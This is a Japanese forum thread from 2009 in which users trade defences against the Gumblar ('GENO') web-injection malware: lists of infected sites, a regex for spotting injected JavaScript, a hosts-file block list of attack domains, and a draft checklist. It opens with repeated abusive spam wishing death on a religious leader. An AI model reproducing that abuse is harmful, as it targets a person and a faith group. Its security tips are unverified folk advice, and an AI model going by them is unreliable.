創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね

創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね

創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね

>>199
じゃとりあえず>>156を

あと
306 名前：名無しさん＠ｺﾞｰｺﾞｰｺﾞｰｺﾞｰ！[sage] 投稿日：2009/05/18(月) 18:36:14 ID:/b1kbV3H0
ttp://genolists.alink.uic.to/に晒されてる疑いのあるサイト検証してきたよ

ALFA ……　白　ソースチェッカーの誤反応と思われ
Tシャツ通販ｻｲﾄ　……　黒　感染確認
kitagawadaisuke ……　白　ソースチェッカーの誤反応と思われ
TALK LIVE ANIMATED ……　白　ソースチェッカーの誤反応と思われ
loca.zombie.jp　……　黒　感染確認
主上支局−小野不由美さーち　……　黒　感染確認　複数感染確認

管理人さん見てたら白のサイトは消して下さい
ソースチェッカーの結果鵜呑みにするのはやめたほうがいいと思う

309 名前：名無しさん＠ｺﾞｰｺﾞｰｺﾞｰｺﾞｰ！[sage] 投稿日：2009/05/18(月) 18:46:39 ID:/b1kbV3H0
ごめん306だけど
kitagawadaisuke ……　白　ソースチェッカーの誤反応と思われ
これは間違い
TOPページは無事だがその下が全部感染してる

でももう確定済みにあがってたね

>>208
>ファイルが書き込み禁止とかなってない？
これを確認する方法もわからない。

誰かーVISTAの人ーーー

pixivがリスト入ってるけど、誰かJavascriptの確認できた？
こちらではなかなか確認できない

2009-05-18
噂を鵜呑みにしてはいけません
Fx一般
FirefoxがGENOウィルス騒動のとばっちりを受けているようなので、基本的なことを確認しておきたい。

Firefoxの先読み機能は、Webページ内に個別の指定がある場合にだけはたらく。
ただし、より一般的な先読み機能を提供するアドオンは存在する。
仮に先読み機能が働いた場合でも、読み込んだページのスクリプトをあらかじめ実行したりはしない。
Firefox 3.5に搭載されるDNSプリフェッチ機能は、ページ自体の先読み機能とは別物。

>195

これだけ知識のある人たちが無報酬で対策を練ってくれてるってネットならではのことで、
私は凄いと思ってるけどね。
情報が錯綜しているわけだから、間違いがあっても当然だし、呼び名なんかにこだわる
必要あるのかな。
正確に説明できないって意味がよくわからないけど、とりあえず通称として流布してるん
だから、それを使うのに問題あるとも思えないんだけど・・・

これまでこの攻撃についてzlkon.lvとかgumblar.cnとかmartuz.cnとか言われてるが、
どれも攻撃サーバの名前であってコロコロ変わっていく。
最近JS:Redirector-H*なんて呼び方もあるようだけど、
これは不正に挿入されたJSコードを指しているだけで攻撃の全貌を現してはいない。

一方、「GENOウィルス」という呼び方は4月の発見当初から使われていて
このキーワードで検索した場合の情報量の蓄積も馬鹿にならない。
今回の攻撃の総称として、もう日本語圏では「GENOウィルス」でいいんじゃないかと思う。

pixiv追加した人は「一部ページ」がどこなのか詳細をください

スレ更新でavastが反応してチェストに入るファイルは危なくないの？

>>213
見てみたが別に異常なさそうだが
google-analyticsで誤検知したんじゃないか

二件を対策済み、pixivを疑いに移動ー

>>218
チェストはウィルスが入っていても大丈夫な場所

>>221　回答ありがとう。えーとそのチェストに入ってるファイルをデスクトップに出しても大丈夫なのかな。
気になってるのは更新で検出されたファイルが誤検出かどうか知りたい。

908 名前：GENO[sage] 投稿日：2009/05/18(月) 20:12:02 ID:ViAG4CWw0 (PC)
幾つか感染サイトのソースをチェッカー挟んで見てみた。
正規表現検索が可能なソフトを使えばローカルでの簡易チェックが可能と思われます。

正規表現例：[Dreamweaver]
\(function\(.*?\)\{(var)*

(function(0〜いくｔかの文字列){var
上記で検索してヒットしたソースに覚えが無ければ怪しい。

ウィルスチェッカーが0%出したところでウィルスのソースがあったので
ツールに頼らず視認しとく方が吉と思う。

名前を使われると困る人達もいるって事だろう。
不名誉だしね。

>>222
出すだけなら別にかまわんが
誤って実行したら知らんぞ

>>212
右クリックでプロパティー

というか、
> これを確認する方法もわからない。
お前さんはWindows Update以外何もしないほうが良い

>>218
スレ更新で反応してるやつは気にしなくていいよ
頭おかしいのが反応するコード書いて喜んでるだけだから

>>225　まじか･･･つまり今回はやりのコードを書き込むだけでウイルスがはいってくるのかな。

>>190
感染確定に入ってる一番下のreplicaと、対策済みのreplicaが重複してるんで片方消しててｸﾚｸﾚ

>>228
んなわけなーだろ

>>127
綴り間違ってた…F-Sercureってなによ… OTL

F-SecureのDB更新されたけど、id10が対応されていない現状…OTL
id2は Exploit.Win32.Pidief.auw で対応。

いまさらちょっと聞きづらいんですが
IEよりFirefoxにしたほうが良いってよく書いてあるのはJS切り易いから？
他にも何か良いことあるのかな？

ググレカス

>>228
チェストに入ったのが専ブラのスレログなら、それは問題ないんじゃね。
ｱﾌｫが書き込んだ文字列に反応してるんだろ

ここはいつから質問スレになったんだろ

pixivは実質白だろ。一部ページってホントどこだ？

他だと基地外多いからじゃね
前スレでも見てろって感じだが

馬鹿が大量に流れてきたからだろ

*.cnで中国全部拒否出来たらいいのに・・・・
ルータもFWもこの記述出来ない

そこでPeerGuardian2ですよ？

初心者板にでも質問スレ立てた方がいいな

まとめ見に行きたいけど怖くて踏めない

>>232
> IEよりFirefoxにしたほうが良いってよく書いてあるのはJS切り易いから？
まぁ、そんなところ。その辺を自分で管理できるなら、IEでもいいと思うよ。

>>242
まとめは管理者以外編集できないようにしてるから今は大丈夫

>>242
そこまで信用できないなら解決するまでネット繋ぐなとしか言えんのだが…

リンク集どうなってんの？
帰ってき○三日天下、まだ黒いんだけど
短時間で対処＆また感染したのか？
あと主上支局が二つあるよ

>>240
それ初めて聞いたから早速調べて来た
かなり便利そうだけどバスター入れてるから併用トラブル怖いんだよねえ・・・・
もうちょい調べて検討してみる、教えてくれてthx

色々情報が混乱してるからではないの
調べ物で前スレとか見ても良いと悪いと両方書いてあったりと

>>226
どこの画面で右クリックプロパティ？
ｵﾗﾜｶﾞﾝﾈ

>>244
トン　今から見てきます

>>245
wikiに昨日愉快犯がいたみたいでgkbrでした

>>204
951 名前：192.168.0.774[sage] 投稿日：2009/05/18(月) 14:44:33 ID:k2CI1leb0
>>945
こんなんでどうだろう。

Vistaでhostsを編集する方法

スタートメニュー→すべてのプログラム→アクセサリ→メモ帳
の上で右クリック

「管理者として実行」を選択

「ファイル」メニュー→「開く」

ファイルの種類を「テキスト文書(*.txt)」から「すべてのファイル(*.*)」に変更

C:\Windows\System32\drivers\etc\hosts
を開く

以下の行を追加し、保存終了
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn

前スレから　vistaでおんなじ症状だったけどこれでできたよ

pixivのスクリプト見て回ったけどインジェクションないっぽ

>>248
URL先はソース見れば一発でわかるんだが、たいした数じゃないし
帰ってき○三日天下に至っては、avestが反応するし

>>249
お前はLANケーブル引っこ抜いてろ

　同　人　板　の　腐　女　子　は　帰　れ　！　！

セキュ板より転記

538 名無しさん＠お腹いっぱい。 sage 2009/05/18(月) 19:22:05
感染サイトの管理人です

サイトの改ざんは３階層目までだな

545 名無しさん＠お腹いっぱい。 sage 2009/05/18(月) 19:24:40
>>538
もうサイト消しちゃった？
もし消してないなら検体にご協力してくれ

584 名無しさん＠お腹いっぱい。 sage 2009/05/18(月) 19:40:04
>>545
パスを変更後該当コードだけを削除したよ
再び改ざんされるか検証中
パスを変えない場合は感染PCを起動させてない状態でも該当コード削除後１時間で改ざんされた

>>249
お前にパーソナルコンピュータはまだ早い
携帯で我慢しておけ

>>246
まじか
上に書かれてた白確認リストに従ったんだけど
また感染したんかねぇ、取り敢えず黒に移しとく

>>251
>「管理者として実行」を選択

この項目がないんだ・・
もう、そうめん食ってウイルスの事は忘れた方がいい？

前スレ951
951 名前：192.168.0.774[sage] 投稿日：2009/05/18(月) 14:44:33 ID:k2CI1leb0
>>945
こんなんでどうだろう。

Vistaでhostsを編集する方法

スタートメニュー→すべてのプログラム→アクセサリ→メモ帳
の上で右クリック

「管理者として実行」を選択

「ファイル」メニュー→「開く」

ファイルの種類を「テキスト文書(*.txt)」から「すべてのファイル(*.*)」に変更

C:\Windows\System32\drivers\etc\hosts
を開く

以下の行を追加し、保存終了
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn

>>249
エクスプローラを開き、アドレスバーに「C:\Windows\System32\drivers\etc」コピペ→Enter
hostsファイルがあるので、それを右クリック→プロパティということさ☆

>>230 そうなのか。
>>228　そう、このスレをjaneで更新したらavastが反応した。ログに反応する事があるんですね

テンプレの
３．NoScriptの導入（Firefoxの導入）
これがよくないな

そういえばオンラインスキャンって今のところ有効かどうかまだはっきりしてないのかな？
まとめwiki見た感じだとニフティのオンラインスキャンは効果ある…と考えていいのか？

>>262
是非改善案を出してください。

>>259
ＰＣ窓から投げ捨てろ

対策法としてWiki貼ってあるサーチ系のサイト多いけど、検体送ろうぜって所は皆無だな

>>258
乙。手間かけてすまんね。
他のもあるかもしれね。

あともし対応済み確定でもうウイルス出ないなら移動より削除で良いかと
再発あるかもだから1日くらいは置いといた方が良いのかな？

>>69
これだけど
今の鯖イギリスだよね？

>>263
亜種が色々あるから効果あるのとないのとある

>>256
>感染PCを起動させてない状態でも該当コード削除後１時間で改ざんされた
GENO恐ろしい子・・・

>>266
検体はもう送ってるだろ

こんなに実感が沸かず、そしてじわじわ恐怖感が
煽られるウイルス今までで初めてです。

>>260
>>265
有難う…とりあえずそうめん食うよ…

>>265
使用してるブラウザのJSをオフでいいんじゃないの
chromeのことはわからんけど

>>274
同意
hosts は補助的な対策だし、JavaScript 切った方がよっぽど有効

正直感染サイトをブラックリスト化していっても埒あかないわ
PC使う人間が賢くなってJavascript実行しないようにしてくれないと。
この際みんなFirefox+Noscriptにしようぜ
IEなんて窓から投げ捨てろｗｗｗ

>>268
たどっていくとわかると思うが
その後にイギリスに移動していている事も書いている

>>264と間違えました

>>256
PC起動させてないのに改ざんって普通できないと思うんだが
1分1秒でも起動しているから改ざんされたんだろ

>>258
リンク集の人ごめん。帰ってきたはキャッシュだった＼(^o^)／
本当に申し訳ないです。PC投げ捨ててくるわ……。

もしかして自分宛？
IEのJavaスクリプトは切ってる。
あとアクティブなんとかも切ってる。
あと、ファイルをどうたらこうたらで開く？実行する？も無効にした。

そうめんに塩こんぶ入れるとおいしいよ…

>>279
ＦＴＰのパスだけ抜かれたんだろ

１．Adobe Flash Player の最新版にアップデート
２．Adobe Acrobat Reader の最新版にアップデート
３．Adobe Acrobat Readerの JavaScript 機能OFF
４．使用しているブラウザのJavaScriptをオフにする。
　（FirefoxならNoscript導入）
５．Windows Updateもやっておく
６．セキュリティ対策ソフトもパターンを最新に更新


こんなもんか？

loca.zombie.jpはガチ黒だな

>>281
ＶｉｓｔａならＵＡＣ切れなければ大丈夫じゃない？
一応sqlsodbc.chm開けるか確認しといたほうがいいけど

>>283
キャッシュも一旦全部消す
誤検出→誤報告とか色々ややこしいから、解析とかしようという人でもない限り消すべき

>>195
今のGENOウイルスって呼び名が、適切じゃないのは分かってるんだけど・・・
素敵すぎる対応でここまで広がる原因とまではいわんけど、きっかけの一つを作ったGENOの名を残してやりたいって感情的な思いがある

Windows 95/98/ME に avast! を導入された方へ

Windows 95/98/ME では、avast! を導入しただけでは、
Webシールドに守られません。

ご使用の全Webブラウザ（2ch専ブラ）ごとに、それぞれの
通信設定で、avast! が通信のプロキシ(代理)サーバーに
なるように自分で設定する必要があります。

avast! を入れても、現在　丸裸　ですから早く設定しましょう。
設定方法は、ヘルプの「Webシールド ― プロバイダの設定」
に書かれています。

avast! を入れて、感染サイトをわざわざ見に行って、
avast! が反応しなかったと書かれていた方、ご愁傷様です。

>>269
そうなのか、ありがとう
とりあえず念のためニフティオンラインスキャンやっておくよ
スキャン中はJS切れないからちょっと不安だがスキャンページとwiki以外見なければ平気かな？

って上に書いてたスマン

>>283
あぶないIPの遮断は？

>>282
ああ改ざんされたのは鯖のデータか
そりゃPC立ち上げてなくても改ざんされるさw
パス抜かれてるんだから

>>279
お前は何もわかっちゃいないんだな

>>293
携帯からこのスレ見るのは大変だよね

>>294
末尾0の携帯って始めて見た

>>295
294は嫌味だろｗ

>>295
>294は末尾Oの>293に対するコメントでしょ。

>>283
そのほうがFirefoxを入れなくてはいけないという意味に取られなくていいね

できれば
４．使用しているブラウザのJavaScriptをオフにする。
　（FirefoxならNoscript導入が便利）
かな

>>292
パス抜いた後どっかに送る→そこから改竄という事か
何となく思い込みで改竄も該当PCから裏で行うものと思ってた

◇感染してるっぽい場合
　ＯＳクリーンインストール一択

◇対策
１．Adobe Flash Player の最新版にアップデート
２．Adobe Acrobat Reader の最新版にアップデート
３．Adobe Acrobat Readerの JavaScript 機能OFF
４．使用しているブラウザのJavaScriptをオフにする。
　（FirefoxならNoscript導入が便利）
５．Windows Updateもやっておく
６．セキュリティ対策ソフトもパターンを最新に更新

◇そのほか予防策
・ブラウザのキャッシュをクリアする
・危険IPのブロック
　PeerGuardian2を導入。もしくはhosts書き換え
　ただしPG2は一部FWと競合する場合あり。



>>286　>>291
質問スレ向けのテンプレとしても考えてるから、何かいい案あったらヨロ

>>298
差し替えた

>>292
収集したパスを確実に有効活用してる辺りが恐ろしい
こういう挙動を見ると>>84とか納得しやすい

対策まとめなら、NoScript導入するよりFirefoxで普通にScript切るように書いた方がわかりやすいと思うんだけど

>>300
ありがとう御座います

ダメだ…携帯だと書き込みづらい…
レスが遅れて変な流れになるな
スマン

>>300
個人的には4.のJS OFFをまず最初に持ってきたほうがいいとは思うんだが、
(手軽で効果が高いし)
少なくとも1と5の実行に必要なのが難しいな。
テンプレっぽい対策だと上から順番にやっていくだろうし。

あとはhosts書き換えもツール不要だし
詳細書いて入れておいてもいいんじゃないだろうか。
ドメイン増えてきたらまた考えたほうがいいが。

>>256
その管理人さんの件ですが、検証後こちらのスレで報告してくれるとの事なので
しばらくお待ちください

感染を確認⇒サーバー上のファイルを全消⇒クリーンなPCからお詫び文掲載＆FTPのPASS変更⇒感染PCもフル再インストール⇒PCがクリーンであることを確認⇒接続＆復旧

の段階を踏んだにもかかわらず、夜中に海外IPからFTPへのログインがあり、
htmlファイルが書き換えられていた。

現在、クリーンインストールをしたPCも、もともとクリーンだったサブPCにも感染の痕跡はない。
これって、一度存在を確認したサーバーを攻撃する特性もあるのだろうか。

思議だ・・・
このスレの>101
読み込んでもなんの反応もしなかったノートンさまが

無印スレの同じコピペに猛烈に反応してログが読み込まれなくなったｗｗ
http://tsushima.2ch.net/test/read.cgi/news/1242643727/


なぜだぁ？

>>287
キャッシュ即消しで無罪になるのは岡ちゃんぐらいだよねぇ( ｀・ω・)（・ω・｀ ）ねぇ

>>307
FTPのパス変えたのにログインされてる時点でクリーンじゃない

感染サイトが書き換えられるのは書き換えロボか何かがクローラーしてて書き換えていくと
思っているのだが、その場合は今のところそいつのドメインは.cnなんだろうか？
注意しててもアンチウィルスにｽﾙｰされる亜種発生でいつ感染してもおかしくない状態なら
.htaccessで中国ドメイン弾いておけばサイトからの二次感染を少しは防げるのだろうか…
気付けば即行クリーンインストールしてサイト削除するが気付くまでの時間の二次感染を
防げるものなら防ぎたい

やっぱテンプレは簡潔じゃないと見向きもされないってことが
>>283を見てよくわかったよ。

>>307
さすがにそれはありないだろ。パス変更かリカバリに失敗してるとしか思えない。

>>311
自前でFTP鯖立てて囮に仕立て上げれば確認出来るんじゃね？

>>311
過去ログみるとわかるが攻撃拠点をどんどん変えているから意味がない
いちおう今の拠点は防いでおいたらどうだ

>>307
＞クリーンなPCからお詫び文掲載＆FTPのPASS変更
順序が逆だろ

>>307
そら、感染状態でFTPパス変えて(その時点で抜かれてる）、それからクリーンにしても意味ないわさ。

>>305
順番通りとなると、JSオフでFlashの更新て出来るっけ？

あと質問スレはPC初心者板で考えてたけど、他に適当な板があれば候補挙げてくれ。
ID出る方が便利だろうし、携帯も判別できればいいかも

たしかに感染した状態でパス変えてるw　意味ねぇw

ん？クリーンなPCからパス変更したんじゃなくて？
だとしたらちょっとアホとしかｗ

>307は
感染PCの他に未感染サブPCも持ってて
FTP変更＆お詫び文は未感染サブマシンの方使ったのに
また書き換えられてたってことでは？

お茶目すぎるｗｗ

>>307
順番が間違ってるな
感染を確認→感染PCをネットから切り離す→クリーンなPCでFTPパス変更、鯖上のファイル撤去、お詫び掲載→
感染PC再インストール→PCがクリーンであることを確認→接続＆復旧

しかし、逆に考えてみれば感染してしまったら変更後即クリーンにしても
ばっちり挙動バレてるってことだな、時間差はどれくらいだか不明だけど
恐ろしい

>>311
>思っているのだが、その場合は今のところそいつのドメインは.cnなんだろうか？
そんなわけないだろｗ
botnet所属のゾンビにやらせてるんだと思うよ

>>318
出来なかったと思うんで、
(手動でWindowsUpdateサイトにいく場合もOFFでは無理だったはず)
とりあえずはその順番が無難かも。

あとは>>251あたりを軽く弄ってhosts書き換えとIP遮断を入れるかどうかかな。
IP遮断はツール必要ならば、無理にテンプレとして書く必要はないだろうけど。

>>318
> 順番通りとなると、JSオフでFlashの更新て出来るっけ？

今確認してきたが駄目だった
まずJS→その後にActiveX実行だね

いや、だから感染したPCは当然、感染を確認した時点で接続切ってる。
感染していないことを確認した別のPCから、パス変えてお詫び掲載してるんだってば。
じゃなきゃ聞かないよ。

クリーンインストール済みPCの挙動もおかしくないし、sqlsodbc.chmの数値も正常、hosts書き換えも対策済。
カスペルスキーのオンラインスキャンをしても感染警告も出ない。

ちなみにFTPにログインしてきたIPはばらばら。IP検索したらアメリカのものだった。

>>327
じゃあ、こんな感じだな。


◇感染してるっぽい場合
　ＯＳクリーンインストール一択

◇対策
１．Windows Updateをやる
２．Adobe Flash Player の最新版にアップデート
３．Adobe Acrobat Reader の最新版にアップデート
４．Adobe Acrobat Readerの JavaScript 機能OFF
５．使用しているブラウザのJavaScriptをオフにする。
　（FirefoxならNoscript導入が便利）
６．セキュリティ対策ソフトもパターンを最新に更新


◇そのほか予防策
・ブラウザのキャッシュをクリアする
・危険IPのブロック
　PeerGuardian2を導入。もしくはhosts書き換え
　ただしPG2は一部FWと競合する場合あり。


後は感染の確認方法か

>>328
ユーザ名がばれてるから辞書アタックとかでpassばれたんじゃね

>>328
変更後のパスは簡単なもの？
簡単な奴ならあっさり破られた可能性も否定できない

>>328
まさかとは思うがわかりやすい変え方してないだろうな？

>>328
サーバーの方もやられてるとか

>>328

> 感染していないことを確認した別のPCから、パス変えてお詫び掲載してるんだってば。

実は新種のげのに

今北産業　しばらく見ないうちに本スレが何故か荒れていたので避難　結局どうなったの？　

>>281
そうめんに塩こんぶ美味そう…。

Vistaでhosts編集これでどうよ？

C:\Windows\System32\drivers\etc\ を開く
そこにあるhostsをデスクトップにコピペする
コピペしたものをテキストエディタで開いて編集する
編集したhostsを
C:\Windows\System32\drivers\etc\に
コピペで上書きする。

いま自分のVistaで試したら出来たよ。

>327
直接取りに行くとか
ttp://www.adobe.com/jp/support/kb/ts/228/ts_228685_ja-jp.html
スタンドアローンインストーラーのダウンロード

6．zlkon-gumblarお役立ち情報 高機能サロン管理システム★さまれぼ！★開発日記
ttp://excomp.cocolog-nifty.com/blog/gumblar.html

猛威を振るっているzlkon.lv/gumblar.cnに関する記事の中で、お役立ち情報を集めました。
他のサイトの引用やパクリではない、独自のノウハウを紹介しています。

ローカルのhtmlも書き換えられるの？

>>328
鯖はレンタル？自鯖？
FTPのアクセスエリアに何か仕込まれてるってのが強いと思うんだけど。。。

>>328
マジで？気になるね。

サーバは、どの程度の権限もってるの？
何か変なプロセス走らせられてるとか。

感染していないことを確認した別のPCが感染していたというオチだったりな

>>287
スペイン風邪みたいなもんか

>>337
すっかり失念してた

ttp://www.macromedia.com/go/full_flashplayer_win_ie
ttp://www.macromedia.com/go/full_flashplayer_win

直リンだとこれでいいのかな
正直そのページの表記は分かりにくい

この勘違い何度も何度も見てるが
「serverとclientは別物」

対策云々結構
解析出来ないならUNIX板あたりでスレ建てなよ
さすがに妄想で広がりつつあるんで口出しさせてもらった
ちなみに俺はセキュ板にいたコボラー
逆asemとか出来ないから↑

一回FTPパス抜かれたら、サーバ側も色々やられるのかな。
HTML書き換え以外にも。

シェルを書き換えたり、cronで変なプログラム走らせたりとか…

>>345
いまどきCOBOL…

…ができて逆汗できぬとはｗ


YOUマスターしちゃいなYO!
たぶんやったらすぐできるようになる

鯖にウイルスが常駐していてクリーンPCからパス変えても
それを見ている可能性があるって事かな？
アメリカのIPさらしたら何か手がかり出てこないか？

>>343
言いえて妙だな
DOUJINウィルスとか新しい呼称を定着させようとしてる奴もいるっぽいけど
やっぱりGENOの初動ミス（隠蔽？）がパンデミックの原因ってのはデカい

自鯖ならありえるかもしれんが
自鯖じゃなければ権限の関係で常駐はもちろんのこと
cronとか関係ないもの書き換えたりはできないだろ

>>345
まぁそうだね。初心者向けにも対策案作るのは素晴らしい事だが
妙な解析から変は誤解広めるのはやめてほしい

>>347
どんどん煽ってくれ
逆汗でまAnubis以上のまともな結果が得られたなら、是非提示してもらおうか

>>346
さすがにそういうものが実行できるようになってるとすると、
鯖側の管理問題だと思うが・・・。自鯖ならわからんけど。

>>347
COBOLって結構使われてるよ

対策簡単すぎてプログラム板のおさん連中は興味ないんだろうな

IDかぶった
354：ID:oH14GReB0はオレ
本物のID:oH14GReB0、オレがID変えてくるからそのままでいいよ

今日は流れ早いな
他板から人流れてきたのかな

自鯖なのかレンサバなのか教えて欲しい。

cron 実行出来るレンサバならあるんじゃないかな。
で、ウイルスHTMLを、自働的に上書きするとか。
逆に、レンサバ側から接続させるとか。

◇感染対象
今のところWindows 2000,XP で感染確認

◇感染してるっぽい場合
ＯＳクリーンインストール一択

◇対策
１．Windows Updateをやる
２．使用しているブラウザのJavaScriptをオフにする。
　（FirefoxならNoscript導入が便利）
３．Adobe Flash Player の最新版にアップデート
　IE版　　　　　ttp://www.macromedia.com/go/full_flashplayer_win_ie
　その他版　　ttp://www.macromedia.com/go/full_flashplayer_win
４．Adobe Acrobat Reader の最新版にアップデート
５．Adobe Acrobat Readerの JavaScript 機能OFFにする
６．セキュリティ対策ソフトもパターンを最新に更新


◇そのほか予防策
・ブラウザのキャッシュをクリアする
・危険IPのブロック
　PeerGuardian2を導入。もしくはhosts書き換え
　ただしPG2は一部FWと競合する場合あり。


◇hosts書き換えの手順

C:\Windows\System32\drivers\etc\　を開く。
そこにある「hosts」というファイルをデスクトップにコピペする
コピペしたものをテキストエディタ（メモ帳でもよい）で開き、以下を最後の行にコピペ

# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn

終わったら保存して閉じる。
そして編集したファイルを元の場所へ上書きする。

>>354
むしろそれだけで済むからパソコン弱い人々には安心な件　亜種がちょっと心配だけど

実行DLLは、文字列の難読化はあるが、パッカはかかってない

・検出
>>154

・対策
Driver32 に書き込み権限与えない

>>351 >>353
おいおい、まってくれよ 通じてないじゃん、よくみてくれ
煽りに見せかけて、逆汗やろうぜっていったんじゃねーかよｗ
COBOL世代なら、CPUってもんががわかるだろうよってことさ

俺のいつもいるスレに現役COBOLerがいるし、
COBOLですっきり記述できるアプリだってある

>>358
対策の所に

感染してしまってから対策しても無駄です。素直にOS再インストールしてから対策を

ってのはどうだい？

つか普通の対策ってテンプレとまとめサイトで十分だろ

ID:87c9A7NGOはもう寝たのだろうか
鯖は自作鯖かレンタルか
パスは簡単なものや推測しやすい単語かなのか
アクセスしてきたアメリカのIPだけでもいいから教えてくれ

hostsの書き換えって何の為にやるの？
簡単でいいから説明してよ。

キャッシュのクリアの意味は？
誤検出って、何が誤検出するの？


感染後に消す意味もないけど、
観戦前に消す意味がわからない・・・

>>361
◇対策　※感染してしまってから対策しても無駄です。素直にOS再インストールしてから対策を

こんな感じか
hosts書き換えは別にするかね

な、なあ、ここ見てたら、アバストさんにここ感染してるから接続切るね。ていわれたんだが。

>>364
感染後に.cnサイトへアクセスしないようにする対策。

>>364
危険なドメインを無効にするため（本来の使い方は違うが）
大雑把に言えばFWと同じ効果が得られる
よく話題になるのは設定が楽だから

しょーもない質問してるやつ全員ググレよカスが

winXP3だけど、定期的にCCleaner掛けてるせいか、sqlsodbc.chmそのものが無い。
（HDD内全部検索かけた）
cmd regedit起動問題なし。これは未感染判定でOK?

>>329
対策の「2.3.を実施するにはIEならスクリプト実行する」
オプション設定が必要と注記いるんじゃないかな。

>>356
被害が広がっているっていう事の証じゃなければいいけどな・・・
よりにもよってNT5系が集中的に狙われるからこんな事になる。

パスを破られた可能性か・・・
簡単にはしていないつもりだけど、もう一度PCの感染の有無を調べてからもっと複雑にしてみるよ。
だから前回の改ざんから数日の間隔があったのかもしれないし。

ちなみにサーバーはさくらのライト。
IDが変えられないから、狙いをつけられた可能性はある。
ひとつのサーバーにたくさんのユーザーが同居してるからその辺も関係あるのかも？
今は大丈夫なようなので、もう一度自分のPCを確認して、
こまめにFTPログイン履歴の様子をチェックしてみることにします。
ご教示ありがとうございました。

>>365
鯖側が修復しても、閲覧側が、腐ったページデータ(のキャッシュ)を再利用したら
またおかしなファイルを拾ってきてしまうことになると

あとは、証拠隠滅と解釈しるって声が大きいが…。

>>373
有料のレンタルならパスバレの可能性が一番でかい気がするな

>>372
セキュリティ板のやつが腐女子がいろんなところで
ウイルスに関して無意味に宣伝していると怒ってたよ

mixi()笑でGENO検索すれば腐女子日記いっぱいだぜｗｗｗｗ

>>371
同じくCClaner常用してるけど、sqlsodbc.chmはあるよ；

>>376
あら？　俺が聞いた話じゃ腐女子が無意味に逆切れして本スレ荒らしてるんじゃなかったっけ？

>>379
誰に聞いたんだ？

>>374
腐ったページ＝ほぼ感染でしょ？
今の対応はクリンインストしかないのなら
意味がないのでは〜

と思ってるんだが・・・

自己レス、2月にﾏﾏﾝCPU他交換したときにnliteで統合、自分に不要な
コンポーネント、サービス削ったので無くなってる可能性大。

>>369
今の所分かってるGENOの悪さするファイルが0.0.0.0のIPアドレスにしかアクセスできなくするって解釈でいいの？
で、そもそも0.0.0.0ってIPアドレスは存在しないってことでいいのかね、初歩的な知識すら無くてすまん

>>371
nlite で 削ったりしてない？
俺もない口なんだけどね。

>>380
セキュ板の現行スレより

103 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/18(月) 22:12:40
>>95
妙な敬語つかった腐女子が私達は悪くない！とよくわからんが荒らす
↓
コピペ連没
↓
運営に通報

の流れ

217 名前： カンパニュラ・ベリディフォーリア(dion軍)[] 投稿日：2009/05/18(月) 21:37:49.06 ID:VX5XUvFi
ht p://maarso.blog.shinobi.jp/

おいちょっとこのサイト踏んだら挙動おかしいんだが
ソース見た限りではおかしなところなかったんだが……

>>371
大丈夫だと思う
確か感染するとsqlsodbc.chmは作られるとかどうとか

>>386
GENOウイルスチェッカー
危険度0%
安全なURLです。踏んでも大丈夫でしょう。
評価ミス報告

◆感染対象
今のところWindows 2000,XP で感染確認

◆感染してるっぽい場合
ＯＳクリーンインストール一択

◆対策　※感染してしまってから対策しても無駄です。素直にOS再インストールしてから対策を

１．Windows Updateをやる
２．使用しているブラウザのJavaScriptをオフにする。
　（FirefoxならNoscript導入が便利）
３．Adobe Flash Player の最新版にアップデート
　JSオフだと更新できないので↓のリンクからインストーラーを落として入れる
　IE版　　　 　ttp://www.macromedia.com/go/full_flashplayer_win_ie
　その他版　　ttp://www.macromedia.com/go/full_flashplayer_win
４．Adobe Acrobat Reader の最新版にアップデート
５．Adobe Acrobat Readerの JavaScript 機能OFFにする
６．セキュリティ対策ソフトもパターンを最新に更新


◆そのほか予防策
・ブラウザのキャッシュはこまめにクリアする（感染ページをPC内から完全に消す）
・危険IPのブロック（トロイの侵入を防ぐため）
　PeerGuardian2を導入。もしくはhosts書き換え
　ただしPG2は一部FWと競合する場合あり。


◆hosts書き換えの手順
　トロイの侵入を防ぐための予防策。ただし新しい配布元が増えると追加の必要あり

C:\Windows\System32\drivers\etc\　を開く。
そこにある「hosts」というファイルをデスクトップにコピペする
コピペしたものをテキストエディタ（メモ帳でもよい）で開き、以下を最後の行にコピペ

# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn

終わったら保存して閉じる。
そして編集したファイルを元の場所へ上書きする。



長くなったんでスレ１に貼る場合はhosts書き換え以下を分割がいいかな
感染確認用のテンプレが面倒すぐる。

>>385
他人の書いたまとめ見て聞いてきたと言ったのか
むこうに行ってるなら全スレ自分の目でみてくればいいのに

腐女子嫌いなセキュ板住人の自演の可能性も捨てきれないな

>>383
テキトーならそんな解釈でいいよ。0.0.0.0は無意味な受け皿とでも思っとけ。

>>384　>>387　ｻﾝｸｽnliteでした。
>>389
>４．Adobe Acrobat Reader の最新版にアップデート
これもスクリプト実行するオプション指定が必要。

>>390
もう酷過ぎてみるに耐えない件　あいつらは一体何と戦っているんだ

>>381
環境再構築が前提なら、やっとくにこしたことはない程度かなあ
腐ったSWF/PDFを無料点検とかで検出する場合もあって、
キャッシュに反応して、なんかおった！って大騒ぎしてもらってもタイヘンなので、
あんまり意味はなくても、キャッシュは掃除しとけって頼む習慣がついてるな

ＦＴＰのパス収集してそこから改ざんしてるって事は、
ある日突然感染サイト全部がウイルス配布サイトになったりするかもしれんのか。
おおこわ。

>>393
スタンドアロンのインストーラーが手に入る場所plz

もうセキュ板は叩き合いスレになってるな

hostsファイルって書き換えた後、また読み取り専用に戻したほうがいいよね？

>>399
おまじないみたいなもんさ

これってブログも感染対象になるの？

>>397
ってか順番変えて2を4の後にすれば解決するね。

>>397
JSオフでも「ダウンロードが開始しない場合は、 ここをクリックしてください。」を
クリックしたら33MB強のファイルが落ちてくるからそれでいいんじゃない？

>>401
自分でScriptうｐるかブログの鯖がやられないかぎり
今の所大丈夫

・・・なんでこのスレ開いた瞬間avast!たんが怒るねん？

>>405
